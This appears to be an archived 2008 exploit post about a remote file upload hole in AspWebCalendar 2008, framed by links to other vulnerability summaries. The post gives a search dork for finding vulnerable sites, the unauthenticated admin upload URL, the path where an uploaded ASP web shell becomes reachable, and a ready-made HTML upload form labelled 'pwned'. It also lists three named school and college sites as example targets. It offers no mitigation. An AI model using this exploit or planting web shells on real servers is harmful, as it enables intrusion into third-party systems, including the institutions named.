Related information Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) vBulletin 3.7.1 PL1 and lower, vBulletin 3.6.10 PL1: XSS in modcp index Academic Web Tools CMS <= 1.4.2.8 Multiple Vulnerabilities eLineStudio Site Composer (ESC) <=2.6 Multiple Vulnerabilities Secunia Research: TorrentTrader Multiple SQL Injection Vulnerabilities From:Alemin_Krali Krali <alemin_(at)_windowslive.com> Date:19.06.2008Subject:AspWebCalendar 2008 Remote File Upload VulnerabilityTitle:AspWebCalendar 2008 Remote File Upload Vulnerability # Discovered by : Alemin_Krali # Dork :calendar.asp?eventdetail http://[site.com]/path/calendar_admin.asp?action=uploadfile ==>>> upload your Asp shell http://[site.com]/path/calendar/eventimages/yourshell.asp ==>>> your address upload form <FORM ENCTYPE='multipart/form-data' METHOD='post' ACTION='http://HOST/PATH//calendar_admin.asp?action=uploadfileprocess&form=&element='><FONT <FONT COLOR='blue' >http://example.com/path/calendar/eventimages/</FONT></FONT><BR ><INPUT TYPE=FILE SIZE=56 NAME='FILE1'><BR><BR><INPUT TYPE='submit' VALUE='pwned'></FORM></P> # ex1:http://bugs.mimnet.northwestern.edu/ConfRoomCal//calendar_admin.asp?action=upload file ex2:http://calendar.newpal.k12.in.us//calendar_admin.asp?action=uploadfile ex3:http://macomb.cc.mi.us/calendar//calendar_admin.asp?action=uploadfile Sp thnx:Cr@zy_King Kerem125 Jextoxic Abo Mohammed
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
vBulletin 3.7.1 PL1 and lower, vBulletin 3.6.10 PL1: XSS in modcp index
Academic Web Tools CMS <= 1.4.2.8 Multiple Vulnerabilities
eLineStudio Site Composer (ESC) <=2.6 Multiple Vulnerabilities
Secunia Research: TorrentTrader Multiple SQL Injection Vulnerabilities
